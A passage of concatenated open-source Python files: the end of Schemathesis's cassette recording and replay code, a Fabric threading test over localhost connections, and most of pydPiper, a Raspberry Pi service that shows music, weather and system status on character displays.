implement it with string composition rather than with adjusting `yaml.Serializer` to emit explicit types.
Another point is that with `pyyaml` we need to emit events and handle some low-level details like providing
tags, anchors to have incremental writing, with strings it is much simpler.
"""
current_id = 1
stream = file_handle.open()
def format_header_values(values: List[str]) -> str:
return "\n".join(f" - {json.dumps(v)}" for v in values)
def format_headers(headers: Dict[str, List[str]]) -> str:
return "\n".join(f" {name}:\n{format_header_values(values)}" for name, values in headers.items())
def format_check_message(message: Optional[str]) -> str:
return "~" if message is None else f"{repr(message)}"
def format_checks(checks: List[SerializedCheck]) -> str:
return "\n".join(
f" - name: '{check.name}'\n status: '{check.value.name.upper()}'\n message: {format_check_message(check.message)}"
for check in checks
)
def format_request_body(request: Request) -> str:
if request.body is not None:
return f""" body:
encoding: 'utf-8'
base64_string: '{request.body}'"""
return ""
def format_response_body(response: Response) -> str:
if response.body is not None:
return f""" body:
encoding: '{response.encoding}'
base64_string: '{response.body}'"""
return ""
while True:
item = queue.get()
if isinstance(item, Initialize):
stream.write(
f"""command: '{get_command_representation()}'
recorded_with: 'Schemathesis {constants.__version__}'
http_interactions:"""
)
elif isinstance(item, Process):
for interaction in item.interactions:
status = interaction.status.name.upper()
stream.write(
f"""\n- id: '{current_id}'
status: '{status}'
seed: '{item.seed}'
elapsed: '{interaction.response.elapsed}'
recorded_at: '{interaction.recorded_at}'
checks:
{format_checks(interaction.checks)}
request:
uri: '{interaction.request.uri}'
method: '{interaction.request.method}'
headers:
{format_headers(interaction.request.headers)}
{format_request_body(interaction.request)}
response:
status:
code: '{interaction.response.status_code}'
message: {json.dumps(interaction.response.message)}
headers:
{format_headers(interaction.response.headers)}
{format_response_body(interaction.response)}
http_version: '{interaction.response.http_version}'"""
)
current_id += 1
else:
break
file_handle.close()
@attr.s(slots=True) # pragma: no mutate
class Replayed:
interaction: Dict[str, Any] = attr.ib() # pragma: no mutate
response: requests.Response = attr.ib() # pragma: no mutate
def replay(
cassette: Dict[str, Any],
id_: Optional[str] = None,
status: Optional[str] = None,
uri: Optional[str] = None,
method: Optional[str] = None,
request_tls_verify: bool = True,
request_cert: Optional[RequestCert] = None,
) -> Generator[Replayed, None, None]:
"""Replay saved interactions."""
session = requests.Session()
session.verify = request_tls_verify
session.cert = request_cert
for interaction in filter_cassette(cassette["http_interactions"], id_, status, uri, method):
request = get_prepared_request(interaction["request"])
response = session.send(request) # type: ignore
yield Replayed(interaction, response)
def filter_cassette(
interactions: List[Dict[str, Any]],
id_: Optional[str] = None,
status: Optional[str] = None,
uri: Optional[str] = None,
method: Optional[str] = None,
) -> Iterator[Dict[str, Any]]:
filters = []
def id_filter(item: Dict[str, Any]) -> bool:
return item["id"] == id_
def status_filter(item: Dict[str, Any]) -> bool:
status_ = cast(str, status)
return item["status"].upper() == status_.upper()
def uri_filter(item: Dict[str, Any]) -> bool:
uri_ = cast(str, uri)
return bool(re.search(uri_, item["request"]["uri"]))
def method_filter(item: Dict[str, Any]) -> bool:
method_ = cast(str, method)
return bool(re.search(method_, item["request"]["method"]))
if id_ is not None:
filters.append(id_filter)
if status is not None:
filters.append(status_filter)
if uri is not None:
filters.append(uri_filter)
if method is not None:
filters.append(method_filter)
def is_match(interaction: Dict[str, Any]) -> bool:
return all(filter_(interaction) for filter_ in filters)
return filter(is_match, interactions)
def get_prepared_request(data: Dict[str, Any]) -> requests.PreparedRequest:
"""Create a `requests.PreparedRequest` from a serialized one."""
prepared = requests.PreparedRequest()
prepared.method = data["method"]
prepared.url = data["uri"]
prepared._cookies = RequestsCookieJar() # type: ignore
if "body" in data:
encoded = data["body"]["base64_string"]
if encoded:
prepared.body = base64.b64decode(encoded)
# There is always 1 value in a request
headers = [(key, value[0]) for key, value in data["headers"].items()]
prepared.headers = CaseInsensitiveDict(headers)
return prepared
|
concurrency.py
|
import codecs
from invoke.vendor.six.moves.queue import Queue
from invoke.vendor.six.moves import zip_longest
from invoke.util import ExceptionHandlingThread
from pytest import skip
from fabric import Connection
_words = "/usr/share/dict/words"
def _worker(queue, cxn, start, num_words, count, expected):
tail = num_words - start
cmd = "tail -n {} {} | head -n {}".format(tail, _words, count)
stdout = cxn.run(cmd, hide=True).stdout
result = [x.strip() for x in stdout.splitlines()]
queue.put((cxn, result, expected))
class concurrency:
# TODO: still useful to use Group API here? Where does this responsibility
# fall between Group and Executor (e.g. phrasing this specifically as a
# generic subcase of Invoke level task parameterization)?
# TODO: spin up multiple temp SSHDs / Paramiko servers / ???
def setup(self):
cxn1 = Connection("localhost")
cxn2 = Connection("localhost")
cxn3 = Connection("localhost")
self.cxns = (cxn1, cxn2, cxn3)
def connections_objects_do_not_share_connection_state(self):
cxn1, cxn2, cxn3 = self.cxns
[x.open() for x in self.cxns]
# Prove no exterior connection caching, socket reuse, etc
# NOTE: would phrase these as chained 'is not' but pep8 linter is being
# stupid :(
assert cxn1 is not cxn2
assert cxn2 is not cxn3
assert cxn1.client is not cxn2.client
assert cxn2.client is not cxn3.client
ports = [x.transport.sock.getsockname()[1] for x in self.cxns]
assert ports[0] is not ports[1] is not ports[2]
def manual_threading_works_okay(self):
# TODO: needs https://github.com/pyinvoke/invoke/issues/438 fixed
# before it will reliably pass
skip()
# Kind of silly but a nice base case for "how would someone thread this
# stuff; and are there any bizarre gotchas lurking in default
# config/context/connection state?"
# Specifically, cut up the local (usually 100k's long) words dict into
# per-thread chunks, then read those chunks via shell command, as a
# crummy "make sure each thread isn't polluting things like stored
# stdout" sanity test
queue = Queue()
# TODO: skip test on Windows or find suitable alternative file
with codecs.open(_words, encoding="utf-8") as fd:
data = [x.strip() for x in fd.readlines()]
threads = []
num_words = len(data)
chunksize = len(data) / len(self.cxns) # will be an int, which is fine
for i, cxn in enumerate(self.cxns):
start = i * chunksize
end = max([start + chunksize, num_words])
chunk = data[start:end]
kwargs = dict(
queue=queue,
cxn=cxn,
start=start,
num_words=num_words,
count=len(chunk),
expected=chunk,
)
thread = ExceptionHandlingThread(target=_worker, kwargs=kwargs)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
t.join(5) # Kinda slow, but hey, maybe the test runner is hot
while not queue.empty():
cxn, result, expected = queue.get(block=False)
for resultword, expectedword in zip_longest(result, expected):
err = u"({2!r}, {3!r}->{4!r}) {0!r} != {1!r}".format(
resultword, expectedword, cxn, expected[0], expected[-1]
)
assert resultword == expectedword, err
|
pydPiper.py
|
#!/usr/bin/python.pydPiper3
# coding: UTF-8
# pydPiper service to display music data to LCD and OLED character displays
# Written by: Ron Ritchey
# Edited by: Saiyato
import json, threading, logging, queue, time, sys, getopt, moment, signal, subprocess, os, copy, datetime, math, requests
import pages
import displays
import sources
import pydPiper_config
import pause
#try:
# import pyowm
#except ImportError:
# pass
exitapp = [ False ]
class music_controller(threading.Thread):
# Receives updates from music services
# Determines what page to displays
# Sends relevant updates to display_controller
# musicdata variables.
# Includes all from musicdata class plus environmentals
musicdata_init = {
'state':"stop",
'musicdatasource':"",
'actPlayer':"",
'artist':"",
'title':"",
'album':"",
'uri':"",
'current':-1,
'elapsed':-1,
'remaining':"",
'total_time':"",
'duration':-1,
'length':-1,
'position':"",
'elapsed_formatted':"",
'elapsed_simple':"",
'volume':-1,
'repeat': 0,
'single': 0,
'random': 0,
'channels':0,
'bitdepth':"",
'bitrate':"",
'samplerate':"",
'type':"",
'tracktype':"",
'repeat_onoff': "Off",
'single_onoff': "Off",
'random_onoff': "Off",
'playlist_display':"",
'playlist_position':-1,
'playlist_count':-1,
'playlist_length':-1,
'current_tempc':0,
'current_tempf':0,
'disk_avail':0,
'disk_availp':0,
'current_time':"",
'utc':moment.utcnow(),
'localtime':moment.utcnow().timezone(pydPiper_config.TIMEZONE),
'current_time_sec':"",
'current_time_formatted':"",
'time_formatted':"",
'current_ip':"",
'outside_conditions':'No data',
'outside_temp_min':0,
'outside_temp_max':0,
'outside_temp_formatted':'',
'system_temp_formatted':''
}
def __init__(self, servicelist, display_controller, showupdates=False):
threading.Thread.__init__(self)
self.daemon = True
self.musicqueue = queue.Queue()
self.image = None
self.showupdates = showupdates
self.display_controller = display_controller
self.musicdata = copy.deepcopy(self.musicdata_init)
self.musicdata_prev = copy.deepcopy(self.musicdata)
self.servicelist = servicelist
self.services = { }
# Attempt to initialize services
self.initservices()
# Lock used to prevent simultaneous update of the musicdata dictionary
self.musicdata_lock = threading.Lock()
def initservices(self):
# Make sure that if rune is selected that is is the only service that is selected
if "rune" in self.servicelist and len(self.servicelist) > 1:
logging.critical("Rune service can only be used alone")
raise RuntimeError("Rune service can only be used alone")
if "volumio" in self.servicelist and len(self.servicelist) > 1:
logging.critical("Volumio service can only be used alone")
raise RuntimeError("Volumio service can only be used alone")
musicservice = None
for s in self.servicelist:
s = s.lower()
try:
if s == "mpd" or s == "moode":
musicservice = sources.musicdata_mpd.musicdata_mpd(self.musicqueue, pydPiper_config.MPD_SERVER, pydPiper_config.MPD_PORT, pydPiper_config.MPD_PASSWORD)
elif s == "spop":
musicservice = sources.musicdata_spop.musicdata_spop(self.musicqueue, pydPiper_config.SPOP_SERVER, pydPiper_config.SPOP_PORT, pydPiper_config.SPOP_PASSWORD)
elif s == "lms":
musicservice = sources.musicdata_lms.musicdata_lms(self.musicqueue, pydPiper_config.LMS_SERVER, pydPiper_config.LMS_PORT, pydPiper_config.LMS_USER, pydPiper_config.LMS_PASSWORD, pydPiper_config.LMS_PLAYER)
elif s == "rune":
musicservice = sources.musicdata_rune.musicdata_rune(self.musicqueue, pydPiper_config.RUNE_SERVER, pydPiper_config.RUNE_PORT, pydPiper_config.RUNE_PASSWORD)
elif s == "volumio":
musicservice = sources.musicdata_volumio2.musicdata_volumio2(self.musicqueue, pydPiper_config.VOLUMIO_SERVER, pydPiper_config.VOLUMIO_PORT, exitapp )
else:
logging.debug("Unsupported music service {0} requested".format(s))
continue
except NameError:
# Missing dependency for requested servicelist
logging.warning("Request for {0} failed due to missing dependencies".format(s))
pass
if musicservice != None:
self.services[s] = musicservice
if len(self.services) == 0:
logging.critical("No music services succeeded in initializing")
raise RuntimeError("No music services succeeded in initializing")
def launch_update_thread(self, func):
sv_t = threading.Thread(target=func)
sv_t.daemon = True
sv_t.start()
def run(self):
logging.debug("Music Controller Starting")
self.launch_update_thread(self.updatesystemvars)
self.launch_update_thread(self.updateconditions)
self.launch_update_thread(self.updateforecast)
timesongstarted = 0
# Inform the system that we are starting up
with self.musicdata_lock:
self.musicdata_prev['state'] = ''
self.musicdata['state'] = 'starting'
self.starttime = time.time()
lastupdate = 0 # Initialize variable to be used to force updates every second regardless of the receipt of a source update
while not exitapp[0]:
updates = { }
# Check if we are starting up. If yes, update pages to display any start message.
if self.starttime + pydPiper_config.STARTUP_MSG_DURATION > time.time():
time.sleep(pydPiper_config.STARTUP_MSG_DURATION)
with self.musicdata_lock:
self.musicdata['state'] = 'stop'
continue
# Attempt to get an update from the queue
try:
updates = self.musicqueue.get_nowait()
self.musicqueue.task_done()
except queue.Empty:
pass
# Get current time
try:
utc = moment.utcnow()
localtime = moment.utcnow().timezone(pydPiper_config.TIMEZONE)
current_time_ampm = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%p").strip()
if pydPiper_config.TIME24HOUR == True:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%H:%M").strip()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%H:%M:%S").strip()
current_time_ampm = ''
else:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%-I:%M %p").strip()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime("%-I:%M:%S %p")
except ValueError:
# Don't know why but on exit, the moment code is occasionally throwing a ValueError
current_time = "00:00"
current_time_sec = "00:00:00"
current_time_ampm = ''
utc = None
localtime = None
with self.musicdata_lock:
# Update musicdata based upon received message
for item, value in updates.items():
self.musicdata[item] = value
# Update song timing variables
if 'elapsed' in updates:
self.musicdata['elapsed'] = self.musicdata['current'] = updates['elapsed']
timesongstarted = time.time() - self.musicdata['elapsed']
if self.musicdata['state'] == 'play':
if 'elapsed' not in updates:
if timesongstarted > 0:
self.musicdata['elapsed'] = int(time.time() - timesongstarted)
else:
# We got here without timesongstarted being set which is a problem...
logging.debug("Trying to update current song position with an uninitialized start time")
# If the value of current has changed then update the other related timing variables
if self.musicdata['elapsed'] != self.musicdata_prev['elapsed']:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata['elapsed']))
timepos_advanced = timepos
total_time = "00:00"
if self.musicdata['length'] > 0:
timepos_advanced = time.strftime("%-M:%S", time.gmtime(self.musicdata['elapsed'])) + "/" + time.strftime("%-M:%S", time.gmtime(self.musicdata['length']))
remaining = time.strftime("%-M:%S", time.gmtime(self.musicdata['length'] - self.musicdata['elapsed'] ) )
total_time = time.strftime("%-M:%S", time.gmtime(self.musicdata['length']))
else:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata['elapsed']))
remaining = timepos
self.musicdata[u'elapsed_formatted'] = timepos_advanced
self.musicdata['remaining'] = remaining
self.musicdata[u'elapsed_simple'] = self.musicdata[u'position'] = timepos
self.musicdata[u'total_time'] = total_time
# Update onoff variables (random, single, repeat)
self.musicdata['random_onoff'] = "On" if self.musicdata['random'] else "Off"
self.musicdata['single_onoff'] = "On" if self.musicdata['single'] else "Off"
self.musicdata['repeat_onoff'] = "On" if self.musicdata['repeat'] else "Off"
# update time variables
self.musicdata['utc'] = utc
self.musicdata['localtime'] = localtime
self.musicdata['time'] = current_time
self.musicdata['time_ampm'] = current_time_ampm
# note: 'time_formatted' is computed during page processing as it needs the value of the strftime key contained on the line being displayed
# For backwards compatibility
self.musicdata['current_time'] = current_time
self.musicdata['current_time_sec'] = current_time
# If anything has changed, update pages ### probably unnecessary to check this now that time is being updated in this section
if self.musicdata != self.musicdata_prev or lastupdate < time.time():
# Set lastupdate time to 1 second in the future
lastupdate = time.time()+1
self.musicdata['time_formatted'] = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime('%H:%M').strip()
# To support previous key used for this purpose
self.musicdata['current_time_formatted'] = self.musicdata['time_formatted']
# Update display controller
# The primary call to this routine is in main but this call is needed to catch variable changes before musicdata_prev is updated.
next(self.display_controller)
# Print the current contents of musicdata if showupdates is True
if self.showupdates:
# Check to see if a variable has changed (except time variables)
shouldshowupdate = False
for item, value in self.musicdata.items():
try:
if item in ['utc', 'localtime', 'time', 'time_ampm', 'current_time', 'current_time_sec']:
continue
if self.musicdata_prev[item] != value:
shouldshowupdate = True
break
except KeyError:
shouldshowupdate = True
break
if shouldshowupdate:
ctime = current_time
print(("Status at time {0}".ctime))
with self.musicdata_lock:
for item,value in self.musicdata.items():
try:
print((" [{0}]={1} {2}".format(item,repr(value), type(value))))
except:
print ("err")
print(("[{0}] =".format(item)))
print((type(value)))
print((repr(value)))
print ("\n")
# Update musicdata_prev
with self.musicdata_lock:
for item, value in self.musicdata.items():
try:
if self.musicdata_prev[item] != value:
self.musicdata_prev[item] = value
except KeyError:
self.musicdata_prev[item] = value
# Update display data every 1/4 second
time.sleep(.25)
def checkweatherconfiguration(self):
if not pydPiper_config.WEATHER_SERVICE:
logging.debug('Weather service not enabled')
return False
if pydPiper_config.WEATHER_SERVICE not in ['wunderground', 'accuweather', 'weerlive']:
logging.warning('{0} is not a valid weather service'.format(pydPiper_config.WEATHER_SERVICE))
return False
if not pydPiper_config.WEATHER_API:
logging.warning('Weather service requires an API key. Weather services will not be available until one is provided')
return False
if not pydPiper_config.WEATHER_LOCATION:
logging.warning('Weather service requires that a location be specified. Weather services will not be available until one is provided')
return False
return True
def checkaccuweatherreturn(self, status_code):
if status_code == 400:
logging.warning('Request had bad syntax or the parameters supplied were invalid. Request was [{0}]'.format(querystr))
elif status_code == 401:
logging.warning('Unauthorized. API authorization failed. API key is [{0}]'.format(pydPiper_config.WEATHER_API))
elif status_code == 403:
logging.warning('Unauthorized. You do not have permission to access this endpoint')
elif status_code == 404:
logging.warning('Server has not found a route matching the given URI. Request was [{0}]'.format(querystr))
elif status_code == 500:
logging.warning('Server encountered an unexpected condition which prevented it from fulfilling the request. Request was [{0}]'.format(querystr))
elif status_code == 200:
return True
else:
logging.warning('An unexpected return value was provide. Value was [{0}]. Request was [{1}]'.format(status_code,querystr))
return False
def updateforecast(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather forecast update process. Forecasts will update every 12 hours at noon and midnight')
while not exitapp[0]:
updateFlag = False
logging.debug('Requesting weather forecast from {0}'.format(pydPiper_config.WEATHER_SERVICE))
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
querystr = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API, })
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
todaysForecast = res['DailyForecasts'][0]
temp_max_f = todaysForecast['Temperature']['Maximum']['Value'] if todaysForecast['Temperature']['Maximum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Maximum']['Value']*1.8)+32,1)
temp_min_f = todaysForecast['Temperature']['Minimum']['Value'] if todaysForecast['Temperature']['Minimum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Minimum']['Value']*1.8)+32,1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_max_f-32)*0.55555556,1)
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_min_f-32)*0.55555556,1)
outside_temp_max_formatted = "{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = "{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = todaysForecast['Day']['IconPhrase']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Forecast calls for a high of {0}, a low of {1}. Condition is {2}'.format(outside_temp_max_formatted, outside_temp_min_formatted, outside_conditions))
with self.musicdata_lock:
self.musicdata['outside_temp_max'] = outside_temp_max
self.musicdata['outside_temp_min'] = outside_temp_min
self.musicdata['outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata['outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata['outside_conditions'] = outside_conditions
# Sleep until next update which occurs every half day
pause.sleepUntil(time.time()+pause.nextHalfday(60), exitapp)
def updateconditions(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather current conditions update process. Current conditions will update every hour')
while not exitapp[0]:
updateFlag = False
# If using accuweather, sample current condition date every hour
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
logging.debug('Requesting current conditions from {0}'.format(pydPiper_config.WEATHER_SERVICE))
querystr = 'http://dataservice.accuweather.com/currentconditions/v1/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API })
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
current_observation = res[0]
temp = current_observation['Temperature']['Imperial']['Value'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else current_observation['Temperature']['Metric']['Value']
temp_formatted = "{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata['outside_temp'] = temp
self.musicdata['outside_temp_formatted'] = temp_formatted
# If using Weather Undergroun, sample current and forecast condition date every hour
elif pydPiper_config.WEATHER_SERVICE == 'wunderground':
querystr = 'http://api.wunderground.com/api/' + pydPiper_config.WEATHER_API + '/geolookup/conditions/forecast/q/' + pydPiper_config.WEATHER_LOCATION + '.json'
r = requests.get(querystr)
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
if 'error' in res['response']:
logging.warning('Error occured retrieving forecast from Weather Underground. Problem type was [{0}]:[{1}]'.format(res['response']['error']['type'],res['response']['error']['description']))
else:
todaysForecast = res['forecast']['simpleforecast']['forecastday'][0]
currentObservation = res['current_observation']
temp = currentObservation['temp_f'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else currentObservation['temp_c']
temp_formatted = "{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
temp_max_f = round(float(todaysForecast['high']['fahrenheit']),1)
temp_min_f = round(float(todaysForecast['low']['fahrenheit']),1)
temp_max_c = round(float(todaysForecast['high']['celsius']),1)
temp_min_c = round(float(todaysForecast['low']['celsius']),1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_max_c
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_min_c
outside_temp_max_formatted = "{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = "{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = currentObservation['weather']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('Weather Underground provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata['outside_temp'] = temp
self.musicdata['outside_temp_formatted'] = temp_formatted
self.musicdata['outside_temp_max'] = outside_temp_max
self.musicdata['outside_temp_min'] = outside_temp_min
self.musicdata['outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata['outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata['outside_conditions'] = outside_conditions
# If using weerlive.nl, sample current condition date every hour
elif pydPiper_config.WEATHER_SERVICE == 'weerlive':
logging.debug('Requesting current conditions from {0}'.format(pydPiper_config.WEATHER_SERVICE))
querystr = 'http://weerlive.nl/api/json-data-10min.php?key=' + pydPiper_config.WEATHER_API + '&locatie=' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr)
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
temp = res['liveweer'][0]['temp']
temp_formatted = "{0}°{1}".format(int(float(temp)),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
temp_max_f = round((float(res['liveweer'][0]['d0tmax'])*1.8)+32,1)
temp_min_f = round((float(res['liveweer'][0]['d0tmin'])*1.8)+32,1)
temp_max_c = float(res['liveweer'][0]['d0tmax'])
temp_min_c = float(res['liveweer'][0]['d0tmin'])
outside = pydPiper_config.WEATHER_OUTSIDE
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_max_c
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_min_c
outside_temp_max_formatted = "{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = "{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = res['liveweer'][0]['samenv']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('weerlive.nl provided a response in an unexpected format. Received [{0}]'.format(res))
logging.warning(KeyError)
logging.warning(IndexError)
logging.warning(ValueError)
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata['outside_temp'] = temp
self.musicdata['outside_temp_formatted'] = temp_formatted
self.musicdata['outside_temp_max'] = outside_temp_max
self.musicdata['outside_temp_min'] = outside_temp_min
self.musicdata['outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata['outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata['outside_conditions'] = outside_conditions
# Sleep until next update which occurs every hour
pause.sleepUntil(time.time()+pause.nextHour(60), exitapp)
def updatesystemvars(self):
logging.debug('Initializing current system status update process. System status will update every five minutes')
while not exitapp[0]:
current_ip = subprocess.getoutput("ip -4 route get 1 | head -1 | cut -d' ' -f8 | tr -d '\n'").strip()
try:
with open("/sys/class/thermal/thermal_zone0/temp") as file:
system_tempc = int(file.read())
# Convert value to float and correct decimal place
system_tempc = round(float(system_tempc) / 1000,1)
# convert to fahrenheit
system_tempf = round(system_tempc*9/5+32,1)
except AttributeError:
system_tempc = 0.0
system_tempf = 0.0
try:
if pydPiper_config.TEMPERATURE.lower() == 'celsius':
system_temp = system_tempc
system_temp_formatted = "{0}°c".format(int(system_temp))
else:
system_temp = system_tempf
system_temp_formatted = "{0}°f".format(int(system_temp))
except:
system_temp = system_tempf
system_temp_formatted = "{0}°f".format(int(system_temp))
try:
# Check if running on OSX. If yes, adjust df command
with os.popen('cat /etc/os-release') as p:
releaseName = p.readline()
if sys.platform == "darwin":
with os.popen("df /") as p:
p = os.popen("df /")
line = p.readline()
line = p.readline()
va = line.split()
line = "{0} {1}".format(va[3], va[4])
va = line.split()
avail = int(va[3])
usedp = int(va[4][:-1]) # Remove trailing % and convert to int
used = int(va[2])
availp = 100-usedp
elif releaseName[6:12] == 'Alpine':
with os.popen("df /") as p:
p = os.popen("df -B 1 /")
line = p.readline()
line = p.readline()
line = p.readline()
va = line.split()
avail = int(va[2])
usedp = int(va[3][:-1]) # Remove trailing % and convert to int
used = int(va[1])
availp = 100-usedp
else:
# assume running on Raspberry linux
with os.popen("df -B 1 /") as p:
line = p.readline()
line = p.readline().strip()
va = line.split()
avail = int(va[3])
usedp = int(va[4][:-1]) # Remove trailing % and convert to int
used = int(va[2])
availp = 100-usedp
except AttributeError:
avail = 0
availp = 0
usedp = 0
used = 0
logging.debug('System status: Temp {0}, Disk space remaining {1}%, IP address {2}'.format(system_temp_formatted, availp, current_ip))
with self.musicdata_lock:
self.musicdata['system_temp'] = system_temp
self.musicdata['system_temp_formatted'] = system_temp_formatted
self.musicdata['system_tempc'] = system_tempc
self.musicdata['system_tempf'] = system_tempf
# For backward compatibility
self.musicdata['current_tempc'] = self.musicdata['system_tempc']
self.musicdata['current_tempf'] = self.musicdata['system_tempf']
self.musicdata['disk_avail'] = avail
self.musicdata['disk_availp'] = availp
self.musicdata['disk_used'] = used
self.musicdata['disk_usedp'] = usedp
self.musicdata['ip'] = current_ip
# For backwards compatibility
self.musicdata['current_ip'] = current_ip
# Sleep until next update which occurs every minutes
pause.sleepUntil(time.time()+300, exitapp)
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
if __name__ == '__main__':
import math
signal.signal(signal.SIGTERM, sigterm_handler)
# Changing the system encoding should no longer be needed
# if sys.stdout.encoding != u'UTF-8':
# sys.stdout = codecs.getwriter(u'utf-8')(sys.stdout, u'strict')
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', filename=pydPiper_config.LOGFILE, level=pydPiper_config.LOGLEVEL)
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger('socketIO-client').setLevel(logging.WARNING)
# Move unhandled exception messages to log file
def handleuncaughtexceptions(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logging.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
try:
if len(mc.musicdata) > 0:
logging.error("Player status at exception")
logging.error(str(mc.musicdata))
except NameError:
# If this gets called before the music controller is instantiated, ignore it
pass
sys.__excepthook__(exc_type, exc_value, exc_traceback)
sys.excepthook = handleuncaughtexceptions
# Suppress MPD libraries INFO messages
loggingMPD = logging.getLogger("mpd")
loggingMPD.setLevel( logging.WARN )
loggingPIL = logging.getLogger('PIL')
loggingPIL.setLevel( logging.WARN )
try:
opts, args = getopt.getopt(sys.argv[1:],"d:",["driver=","devicetype=","width=","height=","rs=","e=","d4=","d5=","d6=","d7=","i2caddress=","i2cport=" ,"wapi=", "wlocale=", "timezone=", "temperature=", "lms","mpd","spop","rune","volumio","pages=", "lmsplayer=", "showupdates"])
except getopt.GetoptError:
print ('pydPiper.py -d <driver> --devicetype <devicetype (for LUMA devices)> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates')
sys.exit(2)
services_list = [ ]
driver = ''
devicetype = ''
showupdates = False
pagefile = 'pages.py'
pin_rs = pydPiper_config.DISPLAY_PIN_RS
pin_e = pydPiper_config.DISPLAY_PIN_E
[pin_d4, pin_d5, pin_d6, pin_d7] = pydPiper_config.DISPLAY_PINS_DATA
rows = pydPiper_config.DISPLAY_HEIGHT
cols = pydPiper_config.DISPLAY_WIDTH
i2c_address = pydPiper_config.DISPLAY_I2C_ADDRESS
i2c_port = pydPiper_config.DISPLAY_I2C_PORT
enable = pydPiper_config.DISPLAY_ENABLE_DURATION
driver = pydPiper_config.DISPLAY_DRIVER
pagefile = pydPiper_config.PAGEFILE
services_list.append(pydPiper_config.MUSIC_SERVICE)
for opt, arg in opts:
if opt == '-h':
